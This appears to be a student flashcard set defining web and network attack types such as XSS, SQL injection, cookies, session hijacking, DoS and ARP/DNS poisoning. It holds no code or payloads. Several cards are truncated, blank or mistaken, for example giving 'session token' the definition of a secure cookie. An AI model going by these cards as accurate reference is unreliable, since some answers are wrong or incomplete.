Question | Answer |
zero day attacks | exploit previously unknown vulnerabilities.no time to defend |
securing web applications | hardening the web server |
securing web applications | protecting the network |
most common web application attacks | cross site scripting |
most common web application attacks | sql injection |
most common web application attacks | xml injection |
most common web application attacks | command injection/directory traversal |
cross site scripting | injects script into a web application server to direct attacks at its clients |
attacks that target applications | web application attacks |
attacks that target applications | client side attacks |
attacks that target applications | buffer overflow attacks |
cross site scripting | refers to an attack using scripting that or |
xss attack requires a web site to meet two criteria | accepts user input without a validating it |
xss attack requires a web site to meet two criteria | uses input in a response without encoding it |
sql injection | targets sql servers by injecting commands |
sql | used to view and manipulate data that is stored in a relational data base |
zero day attacks | exploit previously unknown vulnerabilities so victims have zero days to prepare |
because the content of http transmissions is not examined | attackers use this protocol to target flaws in web application software |
cross site scripting | xss |
xss attack | injects script into a web application server that will then direct attacks at clients |
cross site scripting attacks | uses the server as a platform to launch attacks on other computers that access it |
cross site scripting attack | a person visits an injected web site ,the malicious instructions are sent to the victims web browser and executed |
other xss attacks | designed to steal sensitive information that was retained when visiting sites |
buffer overflow | occurs when a process attempts to store data in ram beyond the boundaries of a fixd length storage buffer |
xml | xtensible markup language |
markup language | method for adding annotations to the text so that the additions can be distinguished from the text itself |
html | markup language designed to display data with the primary focus on how the data looks |
xml injection | an attack that injects xlm tags and data intoa data base |
xpath injection | operate on web sites that uses user-supplied information to construct an XPath query for XML data. |
sql | used to manipulate data stored in relational data base |
sql injection | targets sql servers by injecting commands |
directory transversal attack | an attack that takes advantage of a vulnerability in the web application program |
command injection | injecting and executing commands to execute on a server |
to perform a directory transversal attack | an attackers needs only a web browser,location of default files,directories on the system under attack |
email address unknown | indicates that user input is being properly filtered |
server failure | indicates that the user input is not being filtered,instead all user input is being sent directly to the database |
xml | designed to carry data instead of indicating how to display it |
xml | user defines their own tags |
XML tags begin with the less-than character (“<”) and end with the greater-than character (“>”). You use tags to mark the start and end of elements, which are the logical units of information in an XML document | tags |
An element consists of a start tag, possibly followed by text and other complete elements, followed by an end tag. The following example highlights the tags to distinguish them from the text | elements |
markup language | method for adding annotations to text |
html | uses tags surrounded by brackets |
html | instructor browser to display text in specific format |
xpath injection | attempts to exploit the xml path language queries that are built from user input |
annotation | note that is made while reading any form of text |
html | displays data |
xml | carries data |
client side attacks | targets vulnerabilities in client applications that interact with a compromised server or process malicious data |
server side attacks | web application attacks |
drive by download | a users computer becoming compromised just by viewing a web page and not even clicking any content |
IFrame | inline frame |
iframe | an html element that allows for embedding another html document inside the main document |
common client side attacks | header manipulation |
common client side attacks | cookies and attachments |
common client side attacks | session hijacking |
common client side attacks | malicious add ons |
directory traversal attack | attacker moves from root directory to restricted directories |
command injection attack | attackers enter commands to execute on a server |
http header | composed of fields that contain the different characteristics of the data that is being transmitetd |
http header attacks | referer |
http header attacks | accept language |
drive by download | attackers craft a zero pizel frame to avoid visual detection |
zero pixel iframe | allows for embedding another html document inside the main document |
http header fields | referer |
http header fields | accept language |
http header fields | server |
http header fields | set cookie |
types of cookies | first party |
types of cookies | third party |
types of cookies | session |
types of cookies | persistent |
types of cookies | secure |
types of cookies | flash |
arp | part of the tcp/ip prptocol for determining the mac address based on the ip address |
first party cookie | created from the web site that is currently being viewed |
flash cookie | local shared objects |
flash cookie | cannot be deleted thru the browsers normal configuration settings |
persistent cookie | tracking cookie |
persistent cookie | recored on the hard drive and doent expire when the browser closes |
secure cookie | used when a browser is visiting a server using a secure connection |
session cookie | stored in ram and only lasts for duration of the visit |
syn flood attack | takes advantage of the procedures for initiating a tcp sessions |
transitive access | an attack involving a third party to gain access rights |
smurf attack | broadcasts a ping to all computers on the network yet changes the address from which the request came to that of the target |
type of dos attack | ping flood |
type of dos attack | smurf attack |
type of interception attack | man in the middle |
type of interception attack | replay attack |
distributed denial of service attack | may use hundreds or thousands of zombie computers in a botnet to flood a device with requests |
man in the middle attack | makes it appear that two computers are communicating with each other when actually they are sending and receiving data with a pc in between |
replay attack | similiar to man in the middle except a copy is made before transmitting |
arp poisoning | attack that corrupts the arp cache |
dns poisoning | attack that substitutes dns addresses so that the computer is automatically redirected to another device |
types of attacks generated from arp poisoning | steal data |
types of attacks generated from arp poisoning | prevent internet access |
types of attacks generated from arp poisoning | man in the middle |
types of attacks generated from arp poisoning | dos attack |
cache | temporary storage |
domain name system | a hierarchial name system for matching computer names and numbers |
cookie | a file on a local pc in which a server stores user specific information |
cookie | used to identify repeat visitors,only site created the cooklie can read it |
first party cookie | created from the web site that a user is currently viewing |
third party cookie | site advertisers use these to record user preferences |
flash cookie | named after adobe flash player |
respawning | used to reinstate regular cookies that a user has deleted or blocked |
flash cookies | stored in multiple locations |
session token | used when a browser is visiting a server using a secure connection |
session hijacking | attackers attempt to impersonate user by stealing or guessing session token |
session token | random string assigned used for verification purposes |
malicious addons | programs that provide additional functionality to web browsers |
Active X | method to make programs interactive using a set of rules and controls |
ping flood attack | uses the internet control message protocol to flood a victim with packets |
buffer overflow attack | data overflows into adjacent memory locations |
buffer overflow attack | attackers can change return address |
network attacks | denial of service |
network attack | interception |
network attack | poisoning |
network attack | attack on access rights |
spoofing | impersonation of another computer or device |
smurf attack | ping request with originating address changed |
syn flood attack | uses the three way handshake to attack |
man in the middle | accept legitimate information and respond with counterfeit information |
ddos | virtually impossible to identify and block source of attack |
most common dos attack | distributed denial of service |
man in the middle passive attack | captures the data and uses it later |
arp poisoning | modify the mac address in the arp cache so that the corresponding ip address points to a different computer |
arp | the ip address is known but not the mac address,the sending pc sends out and arp packet to all pcs asking if this is your ip address |
host table | lists the mappings of names to computer numbers |
location for dns poisoning | local host table |
location for dns poisoning | external dns server |
domain name system | expaneded to a hierarchial name system for matching computer names and numbers |
symbolic name | |
host table name system | |
zone transfers | dns servers exchange information among t hemselves |
access right attacks | privilege escalation |
access right attacks | transitive access |